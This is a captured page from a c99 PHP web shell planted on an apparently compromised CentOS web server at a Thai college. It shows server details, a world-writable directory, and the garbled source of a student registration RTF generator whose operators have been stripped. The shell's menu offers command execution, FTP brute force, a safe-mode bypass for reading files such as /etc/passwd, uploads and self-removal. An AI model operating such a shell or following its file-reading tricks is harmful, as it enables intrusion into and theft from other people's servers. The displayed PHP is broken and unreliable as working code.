!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_rptRis120Word.php (3.64 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
function encodeutf $string ) {
    
$utfstr "";
    
    for(
$i=0$i<strlen($string); $i++) {
        
$s substr($string$i1);
        
$val ord($s);
        if(
$val 0x80) {
            
$unicode $val;
            
$utfstr .= "\u".$unicode."'";
        }
        elseif((
0xA1 <= $val and $val <= 0xDA) or (0xDF <= $val and $val <= 0xFB)) {
            
$unicode 0x0E00 $val 0xA0;
            
$utfstr .= "\u".$unicode."'";
        }
    }
    
    return 
"{".$utfstr."}";
}

function 
populate_RTF($vars$doc_file) {
    
$replacements = array ('\\' => "\\\\",
    
'{'  => "\{",
    
'}'  => "\}");
    
    
$document file_get_contents($doc_file);
    if(!
$document)
        return 
false;
    
    foreach(
$vars as $key=>$value) {
        
$search "%%".strtoupper($key)."%%";
        
        
$document str_replace($search$value$document);
    }
    
    return 
$document;
}

if (
$qu_std->num_rows()) {
    
$row_cfg = isset($qu_cfg) ? $qu_cfg->row() : NULL;
    
$row_std = isset($qu_std) ? $qu_std->row() : NULL;

    
$stName getval('prefixName'$row_std).getval('stdName'$row_std).' '.getval('stdSurname'$row_std);

    if (
$qu_tmc->num_rows()) {
        
$row_tmc $qu_tmc->row();
        
$tmId $row_tmc->tmcTmId;
    } else {
        
$tmId '';
    }
    list(
$yy1$mm1$dd1) = preg_split("[/|-]"getval('stdAdmitDate'$row_std));
    
    
$con_tcf = array('tmcAcY' => getval('stdAdY'$row_std) + getval('curNumStudyY'$row_std) - 1,
        
'tmcTmId' => getval('curNumTmPerY'$row_std)
    );
    
$qu_tmc $tmc->qryTmc();
    
$row_tmc $qu_tmc->row();
    list(
$yy2$mm2$dd2) = preg_split("[/|-]"$row_tmc->tmcToDate);
    
    if (
$qu_prs->num_rows()) {
        
$row_prs $qu_prs->row();
        
$ofName $row_prs->name;
    }
    
$row_ac $qu_ac->row();
    
    
$pos = ($row_prs->prsId == $row_ac->acPrsIdDirector) ? 'ผู้อำนวยการ' 'รักษาการในตำแหน่งผู้อำนวยการ';
    
    
$stSignature1 = ($showStPic) ? '..................................................................ลายมือชื่อนักศึกษา' '';
    
$stSignature2 = ($showStPic) ? '(ชื่อ - สกุลตัวบรรจง)' '';
    
    
$vars = array('BNO'=>encodeutf(iconv('UTF-8''TIS-620'$bNo)),
                            
'COLLEGENAME'=>encodeutf(iconv('UTF-8''TIS-620'getval('cfgClgName'$row_cfg))),
                            
'COLLEGEADDRESS'=>encodeutf(iconv('UTF-8''TIS-620'getval('cfgClgAddr'$row_cfg))),
                            
'STNAME'=>encodeutf(iconv('UTF-8''TIS-620'$stName)),
                            
'PROGRAMNAME'=>encodeutf(iconv('UTF-8''TIS-620'getval('curName'$row_std))),
                            
'GENNO'=>encodeutf(getval('genNo'$row_std)),
                            
'STUDYYEAR'=>encodeutf(getval('curNumStudyY'$row_std)),
                            
'DD1'=>encodeutf(intval($dd1)),
                            
'MM1'=>encodeutf(iconv('UTF-8''TIS-620'getMonthTh($mm1))),
                            
'YY1'=>encodeutf($yy1 543),
                            
'STUDENTYEAR'=>encodeutf(getval('stdSyId'$row_std)),
                            
'TMID'=>encodeutf($tmId),
                            
'DD2'=>encodeutf(intval($dd2)),
                            
'MM2'=>encodeutf(iconv('UTF-8''TIS-620'getMonthTh($mm2))),
                            
'YY2'=>encodeutf($yy2 543),
                            
'DD3'=>encodeutf(intval(date('d'))),
                            
'MM3'=>encodeutf(iconv('UTF-8''TIS-620'getMonthTh(date('m')))),
                            
'YY3'=>encodeutf(date('Y') + 543),
                            
'OFNAME'=>encodeutf(iconv('UTF-8''TIS-620'$ofName)),
                            
'POS'=>encodeutf(iconv('UTF-8''TIS-620'$pos)),
                            
'STSIGNATURE1'=>encodeutf(iconv('UTF-8''TIS-620'$stSignature1)),
                            
'STSIGNATURE2'=>encodeutf(iconv('UTF-8''TIS-620'$stSignature2))
    );
}

$new_rtf populate_RTF($varsbase_url().$this->config->item('rg_docRif'));

header("Content-type: application/msword");
header("Content-disposition: inline; filename=ris120.rtf");
header("Content-length: " strlen($new_rtf));

echo 
$new_rtf;
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0114 ]--